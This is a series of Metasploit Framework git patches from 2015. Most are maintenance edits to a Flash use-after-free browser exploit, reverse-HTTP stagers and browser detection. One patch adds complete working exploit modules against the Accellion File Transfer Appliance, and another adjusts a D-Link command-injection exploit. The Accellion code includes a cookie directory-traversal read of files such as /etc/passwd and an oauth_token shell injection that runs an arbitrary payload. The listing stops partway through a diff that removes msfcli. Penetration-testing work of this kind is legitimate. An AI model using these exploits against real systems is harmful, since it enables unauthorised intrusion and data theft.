 modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 9844008c61..ad36130bda 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
         described as an Use After Free while handling ByteArray objects. This module has
         been tested successfully on:
 
-        Windows XP, Chrome 43 and Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
         Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
@@ -60,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
           :ua_name => lambda do |ua|
             case target.name
             when 'Windows'
-              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
             when 'Linux'
               return true if ua == Msf::HttpClients::FF
             end

From 0b59e63084bdb40629a4a10c938ce9f768e8661c Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Tue, 7 Jul 2015 22:37:28 -0500
Subject: [PATCH 0681/1013] keep advanced options on the fat side of the
 conditional

---
 lib/msf/core/payload/windows/reverse_winhttp.rb     | 6 +++---
 lib/msf/core/payload/windows/x64/reverse_winhttp.rb | 6 +++---
 2 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb
index 1bde0dac16..be1c5e95b7 100644
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -32,9 +32,7 @@ module Payload::Windows::ReverseWinHttp
     conf = {
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'] || '127.127.127.127',
-      port:        datastore['LPORT'],
-      retry_count: datastore['StagerRetryCount'],
-      proxy_ie:    datastore['PayloadProxyIE']
+      port:        datastore['LPORT']
     }
 
     # Add extra options if we have enough space
@@ -47,6 +45,8 @@ module Payload::Windows::ReverseWinHttp
       conf[:proxy_user]       = datastore['PayloadProxyUser']
       conf[:proxy_pass]       = datastore['PayloadProxyPass']
       conf[:proxy_type]       = datastore['PayloadProxyType']
+      conf[:retry_count]      = datastore['StagerRetryCount']
+      conf[:proxy_ie]         = datastore['PayloadProxyIE']
     else
       # Otherwise default to small URIs
       conf[:uri]              = generate_small_uri
diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
index a220e58ca8..8c31863621 100644
--- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
@@ -33,9 +33,7 @@ module Payload::Windows::ReverseWinHttp_x64
     conf = {
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'] || '127.127.127.127',
-      port:        datastore['LPORT'],
-      retry_count: datastore['StagerRetryCount'],
-      proxy_ie:    datastore['PayloadProxyIE']
+      port:        datastore['LPORT']
     }
 
     # Add extra options if we have enough space
@@ -48,6 +46,8 @@ module Payload::Windows::ReverseWinHttp_x64
       conf[:proxy_user]       = datastore['PayloadProxyUser']
       conf[:proxy_pass]       = datastore['PayloadProxyPass']
       conf[:proxy_type]       = datastore['PayloadProxyType']
+      conf[:retry_count]      = datastore['StagerRetryCount']
+      conf[:proxy_ie]         = datastore['PayloadProxyIE']
     else
       # Otherwise default to small URIs
       conf[:uri]              = generate_small_uri

From c86d16ffb6048145dfcbbc40e8e68441fa0f76d3 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Tue, 7 Jul 2015 23:15:57 -0500
Subject: [PATCH 0682/1013] update payload sizes

---
 modules/payloads/stagers/windows/x64/reverse_winhttp.rb  | 2 +-
 modules/payloads/stagers/windows/x64/reverse_winhttps.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
index d5bfbfac8e..d87820e334 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttp'
 
 module Metasploit4
 
-  CachedSize = 540
+  CachedSize = 532
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
index 09ba8aa6da..03c844f58b 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttps'
 
 module Metasploit4
 
-  CachedSize = 571
+  CachedSize = 563
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

From cefbdbb8d395da0778b4fa5b5e084a1303875cca Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 8 Jul 2015 12:12:53 -0500
Subject: [PATCH 0683/1013] Avoid unreliable targets

If we can't garantee GreatRanking on specific targets, avoid them.
---
 .../multi/browser/adobe_flash_hacking_team_uaf.rb    | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index ad36130bda..48c9a72bda 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -21,8 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
-        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
-        Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and
+        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
       },
       'License'             => MSF_LICENSE,
@@ -66,6 +65,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
             false
           end,
+          :ua_ver  => lambda do |ver|
+            # Not reliable enough yet, don't fire
+            case target.name
+            when 'Windows'
+              return false if ver == '11.0'
+            end
+
+            true
+          end,
           :flash   => lambda do |ver|
             case target.name
             when 'Windows'

From a3ec56c4cb64bee3da0c38fb42a00c3b537e2b78 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 8 Jul 2015 12:32:38 -0500
Subject: [PATCH 0684/1013] Do it in on_request_exploit because it's too
 specific

---
 .../multi/browser/adobe_flash_hacking_team_uaf.rb | 15 ++++++---------
 1 file changed, 6 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 48c9a72bda..25c711c40a 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -65,15 +65,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
             false
           end,
-          :ua_ver  => lambda do |ver|
-            # Not reliable enough yet, don't fire
-            case target.name
-            when 'Windows'
-              return false if ver == '11.0'
-            end
-
-            true
-          end,
           :flash   => lambda do |ver|
             case target.name
             when 'Windows'
@@ -114,6 +105,12 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
+    if target_info[:os_name] == OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
+      print_warning("Target setup not supported")
+      send_not_found(cli)
+      return
+    end
+
     if request.uri =~ /\.swf$/
       print_status('Sending SWF...')
       send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})

From 21e44f235e80a56254ccdf26e2d8ba70be396e1b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 8 Jul 2015 13:18:57 -0500
Subject: [PATCH 0685/1013] Example of doing Flash detection with Flash

---
 .../exploit/remote/browser_exploit_server.rb  | 30 +++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index a757715780..a8c02ae479 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -90,6 +90,8 @@ module Msf
       @info_receiver_page     = rand_text_alpha(5)
       @exploit_receiver_page  = rand_text_alpha(6)
       @noscript_receiver_page = rand_text_alpha(7)
+      @flash_receiver_page    = rand_text_alpha(8)
+      @flash_swf              = rand_text_alpha(9)
 
       register_options(
       [
@@ -331,6 +333,11 @@ module Msf
 
       # Gathering target info from the detection stage
       case source
+      when :flash
+        # Flash version detection
+        parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
+        version_info = 'FLASH VERSION HERE'
+        update_profile(target_info, :flash, version_info)
       when :script
         # Gathers target data from a POST request
         parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
@@ -411,6 +418,15 @@ module Msf
           "vuln_test"   : <%= js_vuln_test %>
         };
 
+        if (d["flash"])  {
+          // Load SWF for accurate Flash detection
+          // This SWF needs to send the Flash version info as a POST request to BES sort of like this:
+          // <%=get_resource.chomp("/")%>/<%=@info_receiver_page%>/
+          var flashObject = document.createElement("object");
+          flashObject.setAttribute("data", "Flash location from the @flash_swf instance variable");
+          document.body.appendChild(flashObject); // Do you actually need to do this?
+        }
+
         <% if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
           d['office'] = ie_addons_detect.getMsOfficeVersion();
           d['mshtml_build'] = ScriptEngineBuildVersion().toString();
@@ -468,6 +484,11 @@ module Msf
       cookie
     end
 
+    def load_swf_detection
+      # Your SWF loads here
+      ''
+    end
+
 
     # Handles exploit stages.
     #
@@ -492,6 +513,15 @@ module Msf
         html = get_detection_html(ua)
         send_response(cli, html, {'Set-Cookie' => cookie_header(tag)})
 
+      when /#{@flash_swf}/
+        swf = load_swf_detection
+        send_response(cli, swf)
+
+      when /#{@flash_receiver_page}/
+        vprint_status("Received information from Flash")
+        process_browser_info(:flash, cli, request)
+        send_not_found(cli)
+
       when /#{@info_receiver_page}/
         #
         # The detection code will hit this if Javascript is enabled

From 25e0f888dd7c27c9cd57e416d1b7041f7ebe5263 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 8 Jul 2015 13:42:11 -0500
Subject: [PATCH 0686/1013] Initial commit of R7-2015-08 coverage

---
 .../http/accellion_fta_statecode_file_read.rb |  84 ++++++++++++
 .../http/accellion_fta_getstatus_oauth.rb     | 125 ++++++++++++++++++
 .../linux/misc/accellion_fta_mpipe2.rb        |   2 +-
 3 files changed, 210 insertions(+), 1 deletion(-)
 create mode 100644 modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
 create mode 100644 modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb

diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
new file mode 100644
index 0000000000..c0c943a984
--- /dev/null
+++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Accellion FTA statecode Cookie Arbitrary File Read',
+      'Description'    => %q{
+          This module exploits a file disclosure vulnerability in the Accellion
+        File Transfer appliance. This vulnerability is triggered when a user-provided
+        'statecode' cookie parameter is appended to a file path that is processed as
+        a HTML template. By prepending this cookie with directory traversal sequence
+        and appending a NULL byte, any file readable by the web user can be exposed.
+        The web user has read access to a number of sensitive files, including the
+        system configuration and files uploaded to the appliance by users.
+        This issue was confirmed on version FTA_9_11_200, but may apply to previous
+        versions as well. This issue was fixed in software update FTA_9_11_210.
+      },
+      'Author'         => [ 'hdm' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://r-7.co/R7-2015-08'],
+          ['CVE', '2015-2857']
+        ],
+      'DisclosureDate' => 'Jul 10 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('TARGETURI', [true, 'The URI to request that triggers a call to template()', '/courier/intermediate_login.html']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+      ], self.class)
+  end
+
+  def run_host(ip)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => datastore['TARGETURI'],
+      'cookie' => 'statecode=../../../../..' + datastore['FILEPATH'] + '%00',
+    })
+
+    return if not res
+
+    if res.code != 200
+      vprint_status("#{peer} Unexpected response code: #{res.code} #{res.message}")
+      return
+    end
+
+    contents = res.body
+    fname = ::File.basename(datastore['FILEPATH'])
+
+    expected_server  = "Apache"
+    expected_expires = 'Mon, 26 Jul 1997 05:00:00 GMT'
+
+    # Use hints from the server headers to indicate whether we think this was a valid response
+    if res.headers['Server'].to_s == expected_server && res.headers['Expires'].to_s == expected_expires
+      path = store_loot(
+        'accellion.fta.file',
+        'application/octet-stream',
+        rhost,
+        res.body,
+        fname
+      )
+      print_good("#{peer} Sucessfully downloaded #{datastore['FILEPATH']} as #{path}")
+    else
+      vprint_status(
+        "#{peer} Unexpected response headers: (Server=#{res.headers['Server'].inspect} Expected=#{expected_server.inspect}) " +
+        "(Expires=#{res.headers['Expires'].inspect} Expected=#{expected_expires.inspect})"
+      )
+    end
+  end
+
+end
diff --git a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb
new file mode 100644
index 0000000000..d631e258a6
--- /dev/null
+++ b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Accellion FTA getStatus verify_oauth_token Command Execution',
+      'Description'    => %q{
+          This module exploits a metacharacter shell injection vulnerability in the Accellion
+        File Transfer appliance. This vulnerability is triggered when a user-provided
+        'oauth_token' is passed into a system() call within a mod_perl handler. This
+        module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include
+        '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on
+        version FTA_9_11_200, but may apply to previous versions as well. This issue was
+        fixed in software update FTA_9_11_210.
+      },
+      'Author'         => [ 'hdm' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://r-7.co/R7-2015-08'],
+          ['CVE', '2015-2857']
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 1024,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl bash telnet',
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 10 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true])
+      ], self.class)
+  end
+
+  def check
+    uri = '/tws/getStatus'
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'transaction_id' => rand(0x100000000),
+        'oauth_token'    => 'invalid'
+    }})
+
+    unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/
+      return Exploit::CheckCode::Safe
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'transaction_id' => rand(0x100000000),
+        'oauth_token'    => "';echo '"
+    }})
+
+    unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
+      return Exploit::CheckCode::Safe
+    end
+
+    Msf::Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+
+    # The token is embedded into a command line the following:
+    # `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;
+    token = "';#{payload.encoded};echo '"
+
+    uri   = '/tws/getStatus'
+
+    # Other exploitable URLs:
+    # * /seos/find.api (works with no other changes to this module)
+    # * /seos/put.api  (requires some hoop jumping, upload)
+    # * /seos/mput.api (requires some hoop jumping, token && upload)
+
+    print_status("Sending request for #{uri}...")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'transaction_id' => rand(0x100000000),
+        'oauth_token'    => token
+    }})
+
+    if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
+      print_status("Valid response received...")
+    else
+      if res
+        print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
+      else
+        print_error("No reply received from the target")
+      end
+    end
+
+    handler
+  end
+
+end
diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
index bc04a2f684..fbf607d392 100644
--- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
+++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Accellion File Transfer Appliance MPIPE2 Command Execution',
+      'Name'           => 'Accellion FTA MPIPE2 Command Execution',
       'Description'    => %q{
           This module exploits a chain of vulnerabilities in the Accellion
         File Transfer appliance. This appliance exposes a UDP service on

From 67666160e85c8c9d8c6d37f46659f301cbbe67eb Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 8 Jul 2015 13:47:59 -0500
Subject: [PATCH 0687/1013] Add patched server detection

---
 .../scanner/http/accellion_fta_statecode_file_read.rb    | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
index c0c943a984..b59839cd19 100644
--- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
+++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
@@ -57,7 +57,14 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    contents = res.body
+    contents = res.body.to_s
+
+    # Check for patched versions of the FTA
+    if contents =~ / Missing session ID.*Accellion, Inc/m
+      print_error("#{peer} Appears to be a patched Accellion FTA")
+      return
+    end
+
     fname = ::File.basename(datastore['FILEPATH'])
 
     expected_server  = "Apache"

From d7beb1a68593144ec0f99e9d4bff0c43aec1d65c Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Thu, 9 Jul 2015 08:31:11 +0200
Subject: [PATCH 0688/1013] feedback included

---
 .../linux/http/dlink_dspw110_cookie_noauth_exec.rb   | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
index 62e71fd341..a63be7dca8 100644
--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -112,8 +112,8 @@ class Metasploit3 < Msf::Exploit::Remote
     file_upload << cmd << "\n"
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"xxx\"; filename=\"#{@counter}\"")
-    post_data.bound = "-9bcdb049f0d2--"
+    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
+    post_data.bound = "-#{rand_text_alpha(12)}--"
     file = post_data.to_s
 
     @counter = @counter + 1
@@ -121,7 +121,12 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
       send_request_cgi({
         'method'        => 'POST',
-        'uri'           => "/web_cgi.cgi?&request=UploadFile&path=/tmp/",
+        'uri'           => "/web_cgi.cgi",
+        'vars_get' => {
+          '&request' =>'UploadFile',
+          'path' => '/tmp/',
+        },
+        'encode_params' => false,
         'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
         'data'          => file
       })
@@ -132,6 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_final_command(cmd)
+    #very limited space - larger commands crash the webserver
     fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
     begin
       send_request_cgi({

From f59c99e2ffee522f593b302e713a1d949736e245 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 9 Jul 2015 12:50:02 -0500
Subject: [PATCH 0689/1013] Remove msfcli, please use msfconsole -x instead

msfcli is no longer supported, please use msfconsole.

Announcement on SecurityStreet:
Weekly Metasploit Wrapup
Posted by Tod Beardsley in Metasploit on Jan 23, 2015 11:57:05 AM
---
 lib/msf/core/modules/loader/base.rb      |  10 +-
 lib/msf/core/modules/loader/directory.rb |  19 +-
 metasploit-framework.gemspec             |   1 -
 modules/auxiliary/scanner/http/cert.rb   |   4 -
 msfcli                                   | 608 -----------------
 spec/msfcli_spec.rb                      | 812 -----------------------
 tools/profile.sh                         |   2 +-
 7 files changed, 3 insertions(+), 1453 deletions(-)
 delete mode 100755 msfcli
 delete mode 100644 spec/msfcli_spec.rb

diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb
index 81997aae12..5f4586efd6 100644
--- a/lib/msf/core/modules/loader/base.rb
+++ b/lib/msf/core/modules/loader/base.rb
@@ -253,21 +253,13 @@ class Msf::Modules::Loader::Base
   # @return [Hash{String => Integer}] Maps module type to number of
   #   modules loaded
   def load_modules(path, options={})
-    options.assert_valid_keys(:force, :whitelist)
+    options.assert_valid_keys(:force)
 
     force = options[:force]
     count_by_type = {}
     recalculate_by_type = {}
 
-    # This is used to avoid loading the same thing twice
-    loaded_items = []
-
     each_module_reference_name(path, options) do |parent_path, type, module_reference_name|
-      # In msfcli mode, if a module is already loaded, avoid loading it again
-      next if loaded_items.include?(module_reference_name) and options[:whitelist]
-
-      # Keep track of loaded modules in msfcli mode
-      loaded_items << module_reference_name if options[:whitelist]
       load_module(
           parent_path,
           type,
diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb
index 693bcc9036..46f182e4f6 100644
--- a/lib/msf/core/modules/loader/directory.rb
+++ b/lib/msf/core/modules/loader/directory.rb
@@ -56,24 +56,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
           # The module_reference_name doesn't have a file extension
           module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)
 
-          # If the modules argument is set, this means we only want to load specific ones instead
-          # of loading everything to memory - see msfcli.
-          if whitelist.empty?
-            # Load every module we see, which is the default behavior.
-            yield path, type, module_reference_name
-          else
-              whitelist.each do |pattern|
-              # We have to use entry_descendant_path to see if this is the module we want, because
-              # this is easier to identify the module type just by looking at the file path.
-              # For example, if module_reference_name is used (or a parsed relative path), you can't
-              # really tell if php/generic is a NOP module, a payload, or an encoder.
-              if entry_descendant_path =~ pattern
-                yield path, type, module_reference_name
-              else
-                next
-              end
-            end
-          end
+          yield path, type, module_reference_name
         end
       end
     end
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index a9808136ab..1749e6de7d 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -30,7 +30,6 @@ Gem::Specification.new do |spec|
   spec.bindir = '.'
   spec.executables   = [
       'msfbinscan',
-      'msfcli',
       'msfconsole',
       'msfd',
       'msfelfscan',
diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb
index 972508d923..e568f342f7 100644
--- a/modules/auxiliary/scanner/http/cert.rb
+++ b/modules/auxiliary/scanner/http/cert.rb
@@ -21,10 +21,6 @@ class Metasploit3 < Msf::Auxiliary
           This module will check the certificate of the specified web servers
         to ensure the subject and issuer match the supplied pattern and that the certificate
         is not expired.
-
-        Note:  Be sure to check your expression if using msfcli, shells tend to not like certain
-        things and will strip/interpret them (= is a perfect example). It is better to use in
-        console.
       }
     )
 
diff --git a/msfcli b/msfcli
deleted file mode 100755
index 911b32e920..0000000000
--- a/msfcli
+++ /dev/null
@@ -1,608 +0,0 @@
-#!/usr/bin/env ruby
-# -*- coding: binary -*-
-#
-# This user interface allows users to interact with the framework through a
-# command line interface (CLI) rather than having to use a prompting console
-# or web-based interface.
-#
-
-$stderr.puts "[!] ************************************************************************"
-$stderr.puts "[!] *               The utility msfcli is deprecated!                      *"
-$stderr.puts "[!] *            It will be removed on or about 2015-06-18                 *"
-$stderr.puts "[!] *              Please use msfconsole -r or -x instead                  *"
-$stderr.puts "[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/3802   *"
-$stderr.puts "[!] ************************************************************************"
-
-msfbase = __FILE__
-while File.symlink?(msfbase)
-  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
-end
-
-$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
-
-class Msfcli
-  #
-  # Attributes
-  #
-
-  # @attribute framework
-  #   @return [Msf::Simple::Framework]
-
-  #
-  # initialize
-  #
-
-  def initialize(args)
-    @args      = {}
-    @indent    = '   '
-
-    @args[:module_name] = args.shift      # First argument should be the module name
-    @args[:mode]        = args.pop || 'h' # Last argument should be the mode
-    @args[:params]      = args            # Whatever is in the middle should be the params
-
-    if @args[:module_name] =~ /^exploit(s)*\//i
-      @args[:module_name] = @args[:module_name].split('/')
-      @args[:module_name] = @args[:module_name][1, @args[:module_name].length] * "/"
-    end
-  end
-
-  #
-  # Instance Methods
-  #
-
-  # The framework to create and list modules.
-  #
-  # @return [Msf::Simple::Framework]
-  def framework
-    @framework ||= Msf::Simple::Framework.create({'DeferModuleLoads'=>true})
-  end
-
-  # Sets {#framework}.
-  #
-  # @raise [ArgumentError] if {#framework} already set
-  def framework=(framework)
-    if instance_variable_defined? :@framework
-      fail ArgumentError.new("framework already set")
-    end
-
-    @framework = framework
-  end
-
-  #
-  # Returns a usage Rex table
-  #
-  def usage (str = nil, extra = nil)
-    tbl = Rex::Ui::Text::Table.new(
-      'Header'  => "Usage: #{$0} <exploit_name> <option=value> [mode]",
-      'Indent'  => 4,
-      'Columns' => ['Mode', 'Description']
-    )
-
-    tbl << ['(H)elp',        "You're looking at it baby!"]
-    tbl << ['(S)ummary',     'Show information about this module']
-    tbl << ['(O)ptions',     'Show available options for this module']
-    tbl << ['(M)issing',     'Show empty required options for this module']
-    tbl << ['(A)dvanced',    'Show available advanced options for this module']
-    tbl << ['(I)DS Evasion', 'Show available ids evasion options for this module']
-    tbl << ['(P)ayloads',    'Show available payloads for this module']
-    tbl << ['(T)argets',     'Show available targets for this exploit module']
-    tbl << ['(AC)tions',     'Show available actions for this module']
-    tbl << ['(C)heck',       'Run the check routine of the selected module']
-    tbl << ['(E)xecute',     'Execute the selected module']
-
-    tbl.to_s
-
-    $stdout.puts "Error: #{str}\n\n" if str
-    $stdout.puts tbl.to_s + "\n"
-    $stdout.puts "Examples:" + "\n"
-    $stdout.puts "msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
-    $stdout.puts "msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E" + "\n"
-    $stdout.puts extra + "\n" if extra
-    $stdout.puts
-  end
-
-
-  #
-  # Loads up everything in framework, and then returns the module list
-  #
-  def dump_module_list
-    # This is what happens if the user doesn't specify a module name:
-    # msfcli will end up loading EVERYTHING to memory to show you a help
-    # menu plus a list of modules available. Really expensive if you ask me.
-    $stdout.puts "[*] Please wait while we load the module tree..."
-    self.framework = Msf::Simple::Framework.create
-    ext = ''
-
-    tbl = Rex::Ui::Text::Table.new(
-      'Header'  => 'Exploits',
-      'Indent'  => 4,
-      'Columns' => [ 'Name', 'Description' ])
-
-    framework.exploits.each_module { |name, mod|
-      tbl << [  'exploit/' + name, mod.new.name ]
-    }
-    ext << tbl.to_s + "\n"
-
-    tbl = Rex::Ui::Text::Table.new(
-      'Header'  => 'Auxiliary',
